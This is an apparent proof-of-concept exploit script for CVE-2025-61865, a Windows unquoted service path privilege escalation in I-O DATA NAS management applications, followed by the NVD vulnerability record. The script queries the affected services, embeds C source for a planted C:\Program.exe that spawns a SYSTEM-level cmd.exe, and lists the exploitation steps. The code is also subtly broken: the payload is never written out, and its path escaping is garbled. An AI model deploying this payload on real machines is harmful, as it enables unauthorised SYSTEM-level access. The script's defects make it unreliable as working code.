CVE-2025-61865

#!/usr/bin/env python3 """ CVE-2025-61865 PoC - Unquoted Service Path Privilege Escalation Target: I-O DATA NAS Management Applications (NarSuS App, Clone for Windows) Author: [email protected] """ import os import sys import time import subprocess def check_unquoted_paths(): """Check for unquoted service paths in affected applications""" services = [ "NarSuS_UpdateService", "NarSuS_MonitorService", "CloneForWinService" ] print("[*] Checking for unquoted service paths...") for service in services: try: result = subprocess.run( ["sc", "qc", service], capture_output=True, text=True ) if "BINARY_PATH_NAME" in result.stdout: print(f"[+] Found service: {service}") for line in result.stdout.split("\n"): if "BINARY_PATH_NAME" in line: print(f" Path: {line.strip()}") # Check if path contains spaces and no quotes path = line.split(":", 1)[1].strip() if " " in path and not path.startswith('"'): print(f" [!] VULNERABLE: Unquoted path with spaces detected!") except Exception as e: print(f"[-] Error checking {service}: {e}") def create_payload(exploit_path): """Generate malicious executable for privilege escalation""" payload_code = f''' #include <windows.h> #include <stdio.h> BOOL APIENTRY DllMain(HMODULE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {{ switch (ul_reason_for_call) {{ case DLL_PROCESS_ATTACH: case DLL_THREAD_ATTACH: // Create reverse shell or execute arbitrary code as SYSTEM WinExec("cmd.exe /c whoami > C:\\\\temp_pwned.txt", SW_HIDE); break; }} return TRUE; }} int main() {{ // This executable will be placed at the unquoted path // and executed with SYSTEM privileges FILE *f = fopen("C:\\\\\\\\windows\\\\\\\\temp_pwned.txt", "w"); if (f) {{ fprintf(f, "SYSTEM shell obtained via CVE-2025-61865\\n"); fclose(f); }} // Spawn SYSTEM cmd.exe STARTUPINFO si; PROCESS_INFORMATION pi; ZeroMemory(&si, sizeof(si)); ZeroMemory(&pi, sizeof(pi)); si.cb = sizeof(si); CreateProcess("C:\\\\\\\\windows\\\\\\\\\\\\system32\\\\\\\\cmd.exe", NULL, NULL, NULL, FALSE, 0, NULL, NULL, &si, &pi); return 0; }} ''' print(f"[!] In real attack, malicious executable would be placed at:") print(f" {exploit_path}") print(f"[!] This file will be executed with SYSTEM privileges when service starts") def main(): print("="*60) print("CVE-2025-61865 PoC - Unquoted Service Path") print("Target: I-O DATA NAS Management Applications") print("="*60) # Step 1: Identify vulnerable services check_unquoted_paths() # Step 2: Generate exploitation path # Example: If service path is "C:\Program Files\I-O DATA\NarSuS\service.exe" # Attacker places malicious.exe at "C:\Program Files\I-O.exe" print("\n[*] Exploitation strategy:") print(" 1. Identify unquoted service path containing spaces") print(" 2. Calculate intermediate path for exploitation") print(" 3. Place malicious executable at that path") print(" 4. Wait for service restart or system reboot") print(" 5. Gain SYSTEM privileges") # Example vulnerable path example_path = "C:\\\\Program Files\\\\I-O DATA\\\\NarSuS\\\\NarSuS_service.exe" exploit_path = "C:\\\\Program.exe" # First space-separated word create_payload(exploit_path) print("\n[*] Mitigation: Apply vendor patches or use quoted paths") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-61865", "sourceIdentifier": "[email protected]", "published": "2025-10-23T05:15:32.743", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Multiple NAS management applications provided by I-O DATA DEVICE, INC. register Windows services with unquoted file paths. A user with the write permission on the root directory of the system drive may execute arbitrary code with SYSTEM privilege."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "baseScore": 6.7, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 0.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://jvn.jp/en/jp/JVN03295012/", "source": "[email protected]"}, {"url": "https://www.iodata.jp/support/information/2025/10_NarSuS_App/", "source": "[email protected]"}, {"url": "https://www.iodata.jp/support/information/2025/12_CloneforWindows/", "source": "[email protected]"}]}}